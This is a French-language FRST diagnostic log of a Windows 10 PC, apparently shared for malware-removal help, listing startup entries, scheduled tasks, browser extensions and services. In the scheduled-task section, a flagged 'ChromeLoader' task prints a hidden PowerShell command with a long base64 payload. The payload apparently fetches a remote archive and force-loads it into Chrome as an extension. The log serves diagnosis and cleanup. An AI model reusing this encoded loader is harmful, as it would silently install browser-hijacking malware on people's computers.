Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 27-12-2021
Exécuté par citro (administrateur) sur DESKTOP-6UU23A3 (Micro-Star International Co., Ltd. MS-7C52) (05-01-2022 09:33:46)
Exécuté depuis C:\Users\citro\Downloads
Profils chargés: citro
Plate-forme: Microsoft Windows 10 Professionnel Version 20H2 19042.1415 (X64) Langue: Français (France)
Navigateur par défaut: Chrome
Mode d'amorçage: Normal

==================== Processus (Avec liste blanche) =================

(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)

(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2103.8.0_x64__8wekyb3d8bbwe\Calculator.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe

==================== Registre (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)

HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe [1361000 2021-09-27] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (Pas de fichier)
HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-08-09] (Open Source Developer, Robin Krom -> Greenshot)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1313408 2017-07-05] (Canon Inc. -> CANON INC.)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (Canon Inc. -> CANON INC.)
HKLM-x32\...\Run: [RazerCortex] => C:\Program Files (x86)\Razer\Razer Cortex\CortexLauncher.exe [267072 2021-11-25] (Razer USA Ltd. -> Razer Inc.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKU\S-1-5-21-3135447292-1754572431-4060835378-1002\...\Run: [BitTorrent] => C:\Users\citro\AppData\Roaming\BitTorrent\BitTorrent.exe [2283816 2021-11-05] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-3135447292-1754572431-4060835378-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4267432 2021-12-16] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-3135447292-1754572431-4060835378-1002\...\Run: [Discord] => C:\Users\citro\AppData\Local\Discord\Update.exe [1512104 2021-05-24] (Discord Inc. -> GitHub)
HKU\S-1-5-21-3135447292-1754572431-4060835378-1002\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [33618400 2021-12-16] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-3135447292-1754572431-4060835378-1002\...\Run: [Synapse3] => C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe [3524216 2021-12-09] (Razer USA Ltd. -> Razer Inc.)
HKU\S-1-5-21-3135447292-1754572431-4060835378-1002\...\Run: [bt] => C:\Users\citro\AppData\Roaming\BitTorrent\BitTorrent.exe [2283816 2021-11-05] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-3135447292-1754572431-4060835378-1002\...\MountPoints2: {b0dd63c9-dcbf-11eb-bbf6-2cf05dacde36} - "E:\setup.exe"
HKU\S-1-5-21-3135447292-1754572431-4060835378-1002\...\MountPoints2: {b0dd642f-dcbf-11eb-bbf6-2cf05dacde36} - "F:\setup.exe"
HKU\S-1-5-21-3135447292-1754572431-4060835378-1002\...\MountPoints2: {b0dd6490-dcbf-11eb-bbf6-2cf05dacde36} - "G:\autorun\autorun.exe"
HKU\S-1-5-21-3135447292-1754572431-4060835378-1002\...\MountPoints2: {b0dd6496-dcbf-11eb-bbf6-2cf05dacde36} - "I:\autorun\autorun.exe"
HKU\S-1-5-18\...\Run: [Synapse3] => C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe [3524216 2021-12-09] (Razer USA Ltd. -> Razer Inc.)
HKLM\...\Windows x64\Print Processors\Canon MG5600 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDCA.DLL [30208 2014-03-18] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MG5600 series: C:\WINDOWS\system32\CNMLMCA.DLL [406016 2014-03-18] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJNP Port: C:\WINDOWS\system32\CNMN6PPM.DLL [375296 2014-03-17] (CANON INC.) [Fichier non signé]
HKLM\Software\...\AppCompatFlags\Custom\BstMv4a.exe: [{d538dce4-1e91-4fc4-a322-8fecb6fd35a0}.sdb] -> Bust-A-Move 4
HKLM\Software\...\AppCompatFlags\InstalledSDB\{d538dce4-1e91-4fc4-a322-8fecb6fd35a0}: [DatabasePath] -> C:\WINDOWS\AppPatch\CustomSDB\{d538dce4-1e91-4fc4-a322-8fecb6fd35a0}.sdb [2020-03-07]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\96.0.4664.110\Installer\chrmstp.exe [2021-12-15] (Google LLC -> Google LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScpToolkit Tray Notifications.lnk [2021-09-15]
ShortcutTarget: ScpToolkit Tray Notifications.lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpTrayApp.exe (Open Source Developer, Benjamin Höglinger-Stelzer -> Scarlet.Crush Productions)
Startup: C:\Users\citro\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ADILOOK Français sur disque C.LNK [2021-07-06]
ShortcutTarget: ADILOOK Français sur disque C.LNK -> C:\COKTEL\ADI4\ADILOOK.EXE (Pas de fichier)
Startup: C:\Users\citro\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jarvee.lnk [2021-09-08]
ShortcutTarget: Jarvee.lnk -> C:\Users\citro\AppData\Roaming\Jarvee\Jarvee.exe (Pas de fichier)
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Tâches planifiées (Avec liste blanche) ============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {158E4533-3577-4FFB-8463-B4156064C3BC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {4BF207A5-8A03-4361-872D-4694FC1A7DDA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {61126803-DDC8-464C-9AAD-F81D38E47B37} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [138584 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {693A988E-01B8-40D4-9C18-F881F3BD6697} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [8388528 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {6C130088-1331-485E-81EC-7D95BD777B04} - System32\Tasks\BlueStacksHelper_nxt => C:\Program Files\BlueStacks_nxt\BlueStacksHelper.exe [271520 2021-06-28] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
Task: {7121025C-A8F5-47A9-B01B-2429C7B70DB3} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIAA9ACAAIgAkACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACkAXABhAHIAYwBoAGkAdgBlAC4AegBpAHAAIgAKACQAdABhAHMAawBOAGEAbQBlACAAPQAgACIAQwBoAHIAbwBtAGUATABvAGEAZABlAHIAIgAKACQAZABvAG0AYQBpAG4AIAA9ACAAIgBiAHIAbwBrAGUAbgBuAGEALgB3AG8AcgBrACIACgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAAKACQAZABkACAAPQAgADAACgAkAHYAZQByACAAPQAgADAACgAKACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAHQAZQByACAAIgBuAGEAbQBlAD0AJwBjAGgAcgBvAG0AZQAuAGUAeABlACcAIgApACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIABDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKAAkAaQBmACgAJABfACAALQBNAGEAdABjAGgAIAAiAGwAbwBhAGQALQBlAHgAdABlAG4AcwBpAG8AbgAiACkAewAKAAkACQBiAHIAZQBhAGsACgAJAH0ACgAKAAkAJABpAHMATwBwAGUAbgAgAD0AIAAxAAoAfQAKAAoAaQBmACgAJABpAHMATwBwAGUAbgApAHsACgAKAAkAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgApACkAewAKAAoACQAJAHQAcgB5AHsACgAJAAkACQB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAG8AbQBhAGkAbgAvAGEAcgBjAGgAaQB2AGUALgB6AGkAcAAiACAALQBvAHUAdABmAGkAbABlACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiAAoACQAJAH0AYwBhAHQAYwBoAHsACgAJAAkACQBiAHIAZQBhAGsACgAJAAkAfQAKAAoACQAJAEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0ATABpAHQAZQByAGEAbABQAGEAdABoACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAHgAdABQAGEAdABoACIAIAAtAEYAbwByAGMAZQAKAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAATIHAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEYAbwByAGMAZQAKAAoACQB9AAoACQBlAGwAcwBlAHsACgAKAAkACQB0AHIAeQB7AAoACQAJAAkAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACIAJABjAG8AbgBmAFAAYQB0AGgAIgApAAoACQAJAAkAewAKAAkACQAJAAkAJABjAG8AbgBmACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAYwBvAG4AZgBQAGEAdABoAAoACQAJAAkACQAkAGMAbwBuAGYALgBTAHAAbABpAHQAKAAiADsAIgApACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsACgAJAAkACQAJAAkAaQBmACAAKAAkAF8AIAAtAE0AYQB0AGMAaAAgACIAZABkACIAKQAKAAkACQAJAAkACQB7AAoACQAJAAkACQAJAAkAJABkAGQAIAA9ACAAJABfAC4AUwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQAKAAkACQAJAAkACQB9AGUAbABzAGUAaQBmACAAKAAkAF8AIAAtAE0AYQB0AGMAaAAgACIARQB4AHQAZQBuAHMAaQBvAG4AVgBlAHIAcwBpAG8AbgAiACkACgAJAAkACQAJAAkAewAKAAkACQAJAAkACQAJACQAdgBlAHIAIAA9ACAAJABfAC4AUwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQAKAAkACQAJAAkACQB9AAoACQAJAAkACQB9AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQBpAGYAIAAoACQAZABkACAALQBhAG4AZAAgACQAdgBlAHIAKQB7AAoACgAKAAkACQAJAHQAcgB5AHsACgAKAAkACQAJAAkAJAB1AG4AIAA9ACAAdwBnAGUAdAAgACIAaAB0AHQAcABzADoALwAvACQAZABvAG0AYQBpAG4ALwB1AG4APwBkAGkAZAA9ACQAZABkACYAdgBlAHIAPQAkAHYAZQByACIACgAKAAkACQAJAAkAaQBmACgAJAB1AG4AIAAtAE0AYQB0AGMAaAAgACIAJABkAGQAIgApAHsACgAJAAkACQAJAAkAVQBuAHIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIAJAB0AGEAcwBrAE4AYQBtAGUAIgAgAC0AQwBvAG4AZgBpAHIAbQA6ACQAZgBhAGwAcwBlAAoACQAJAAkACQAJAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgABMgcABhAHQAaAAgACIAJABlAHgAdABQAGEAdABoACIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAGMAdQByAHMAZQAKAAkACQAJAAkAfQAKAAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAG8AbQBhAGkAbgAvAGEAcgBjAGgAaQB2AGUALgB6AGkAcAA/AGQAaQBkAD0AJABkAGQAJgB2AGUAcgA9ACQAdgBlAHIAIgAgAC0AbwB1AHQAZgBpAGwAZQAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAKAAkACQAJAH0ACgAJAAkACQBjAGEAdABjAGgAewB9AAoACgAJAAkACQBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiACkAewAKAAkACQAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIAYQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAgAC0ARgBvAHIAYwBlAAoACQAJAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAATIHAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEYAbwByAGMAZQAKAAkACQAJAH0ACgAKAAkACQB9AAoACgAJAH0ACgAKAAkAdAByAHkAewAKAAkACQBHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIABjAGgAcgBvAG0AZQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AQwBsAG8AcwBlAE0AYQBpAG4AVwBpAG4AZABvAHcAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9AAoACQAJAHMAdABhAHIAdAAgAGMAaAByAG8AbQBlACAALQAtAGwAbwBhAGQALQBlAHgAdABlAG4AcwBpAG8AbgA9ACIAJABlAHgAdABQAGEAdABoACIALAAgAC0ALQByAGUAcwB0AG8AcgBlAC0AbABhAHMAdAAtAHMAZQBzAHMAaQBvAG4ALAAgAC0ALQBuAG8AZQByAHIAZABpAGEAbABvAGcAcwAsACAALQAtAGQAaQBzAGEAYgBsAGUALQBzAGUAcwBzAGkAbwBuAC0AYwByAGEAcwBoAGUAZAAtAGIAdQBiAGIAbABlAAoACQB9AGMAYQB0AGMAaAB7AH0ACgAKAH0A /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4303 caractères en plus). (Pas de fichier) <==== ATTENTION
Task: {734B354E-87D6-4DB3-A88E-D2E93CD2D2E7} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7828AFDD-1134-4FB1-9A5E-1C61E8A36AA3} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3135447292-1754572431-4060835378-500 => C:\Users\citro\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (Pas de fichier)
Task: {8166A730-C1BB-4FFF-8DBF-77574B404826} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [8388528 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {9606C95A-7E27-4610-89F4-4EA0B2B05C37} - System32\Tasks\Online_KMS_Activation_Script-Renewal => %ProgramData%\Online_KMS_Activation\Activate.cmd Task
Task: {9CAA78CA-F894-48E0-93C5-A25559AA2253} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {BDF419D5-D0A4-4788-9427-8B801865C164} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154456 2021-04-26] (Google LLC -> Google LLC)
Task: {C01A0F04-B0A6-4AFE-B08C-B1DE91D2CE99} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22797704 2021-12-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {CC09BAC0-4D92-4E3C-9084-C4EBB9BFC6FB} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [138584 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {E2E59230-64D7-48E7-9465-F207D12E41FE} - System32\Tasks\ScpUpdater => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe [460480 2016-04-12] (Open Source Developer, Benjamin Höglinger-Stelzer -> Nefarius Software Solutions)
Task: {EB9C6E11-4193-46E6-827C-3B794A15EA1D} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22797704 2021-12-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {F424A886-AFAC-4237-8C38-8227337FF663} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154456 2021-04-26] (Google LLC -> Google LLC)

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)

Task: C:\WINDOWS\Tasks\ScpUpdater.job => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe

==================== Internet (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Hosts: Il y a plus d'un élément dans hosts. Voir la section Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{25d730ff-b437-44fb-abc8-6175e42d4a6c}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{9713377d-6ad8-486c-ace0-4f80aac6a96d}: [DhcpNameServer] 192.168.1.254

Edge:
=======
Edge Profile: C:\Users\citro\AppData\Local\Microsoft\Edge\User Data\Default [2022-01-04]
Edge DefaultSearchURL: Default -> {bing:baseURL}search?q={searchTerms}&{bing:cvid}{bing:msb}{google:assistedQueryStats}
Edge Extension: (Bouton Enregistrer Pinterest) - C:\Users\citro\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bkgoflemacdadndiohhdnphcmdhacabg [2022-01-02]
Edge Extension: (Microsoft Rewards) - C:\Users\citro\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bnplfnhcidhhdapmblniehfaaompjlck [2021-11-15]
Edge Extension: (Invisible pour Facebook Messenger) - C:\Users\citro\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\dbgkpbgjflkolebcgpclbfdhopbidoen [2022-01-02]
Edge Extension: (Adblock Plus - bloqueur de publicités gratuit) - C:\Users\citro\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\gmgoamodcdcjnbaobigkjelfplakmdhh [2022-01-02]
Edge Extension: (IGRAAL : Cashback & codes promo) - C:\Users\citro\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hgfjoaookbahbhinopgfoiajfijfcdhm [2022-01-02]
Edge Extension: (Tampermonkey) - C:\Users\citro\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\iikmkjmpaadaobahmlepeloendndfphd [2022-01-02]
Edge Extension: (Poulpeo : cashback, réductions et codes promo) - C:\Users\citro\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\lelehponoadknmgbnmgkcniabpopckme [2022-01-02]

FireFox:
========
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll [2019-07-02] (CANON INC.) [Fichier non signé]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default [2022-01-05]
CHR Notifications: Default -> hxxps://fr.banggood.com; hxxps://particuliers.engie.fr; hxxps://www.influence4you.com
CHR Extension: (Slides) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-04-26]
CHR Extension: (Docs) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-04-26]
CHR Extension: (Google Drive) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-04-26]
CHR Extension: (YouTube) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-04-26]
CHR Extension: (Adblock Plus - bloqueur de publicités gratuit) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2021-11-24]
CHR Extension: (Invisible pour Facebook Messenger) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\dbgkpbgjflkolebcgpclbfdhopbidoen [2021-09-14]
CHR Extension: (Tampermonkey) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2021-05-23]
CHR Extension: (Sheets) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-04-26]
CHR Extension: (Google Docs hors connexion) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-11-25]
CHR Extension: (Bouton Enregistrer Pinterest) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpdjojdkbbmdfjfahjcgigfpmkopogic [2021-12-04]
CHR Extension: (Voice Recognition) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\ikjmfindklfaonkodbnidahohdfbdhkn [2021-04-26]
CHR Extension: (IGRAAL : Cashback & codes promo) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\kmhkepipobnjllejbafajoemahjejdcm [2021-12-18]
CHR Extension: (Poulpeo : cashback, réductions et codes promo) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\lelehponoadknmgbnmgkcniabpopckme [2021-11-24]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-04-26]
CHR Extension: (Gmail) - C:\Users\citro\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-04-26]
CHR Extension: (Settings) - C:\Users\citro\AppData\Local [2022-01-05]
CHR Profile: C:\Users\citro\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-11-12]
CHR Profile: C:\Users\citro\AppData\Local\Google\Chrome\User Data\System Profile [2021-11-12]

==================== Services (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8901968 2021-05-22] (BattlEye Innovations e.K. -> )
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [12129128 2021-12-10] (Microsoft Corporation -> Microsoft Corporation)
S4 Ds3Service; C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe [394944 2016-04-12] (Open Source Developer, Benjamin Höglinger-Stelzer -> Scarlet.Crush Productions)
S4 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [818304 2021-05-22] (EasyAntiCheat Oy -> Epic Games, Inc)
S4 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [84616 2013-06-28] (Canon Inc. -> )
S4 Razer Game Manager Service; C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe [254224 2021-11-16] (Razer USA Ltd. -> Razer Inc)
S4 Razer Synapse Service; C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe [294520 2021-12-09] (Razer USA Ltd. -> Razer Inc.)
S4 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2338096 2021-10-05] (Rockstar Games, Inc. -> Rockstar Games)
S4 RzActionSvc; C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe [533824 2021-10-21] (Razer USA Ltd. -> Razer Inc.)
S4 RzKLService; C:\Program Files (x86)\Razer\Razer Cortex\RzKLService.exe [291320 2021-11-25] (Razer USA Ltd. -> Razer Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6138112 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
